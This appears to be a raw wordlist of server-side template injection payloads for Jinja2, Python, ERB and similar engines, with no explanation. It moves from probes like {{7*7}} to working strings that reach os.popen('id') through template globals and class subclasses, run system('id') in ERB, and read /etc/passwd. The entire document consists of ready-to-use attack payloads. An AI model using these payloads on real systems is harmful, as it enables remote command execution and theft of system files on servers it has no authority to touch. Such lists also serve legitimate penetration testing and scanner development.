{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
{{7*'7'}}
${7*7}
<%= system('id') %>
{{config.items()}}
{{self.__class__.__mro__}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__self__.__name__}}
{{lipsum.__globals__['os'].popen('id').read()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{().__class__.__bases__[0].__subclasses__()}}
{% for c in [].__class__.__base__.__subclasses__() %}{{c.__name__}}{% endfor %}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
{{range.__class__.__base__.__subclasses__()[0].__init__.__globals__['os'].popen('id').read()}}
<%= File.open('/etc/passwd').read %>
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
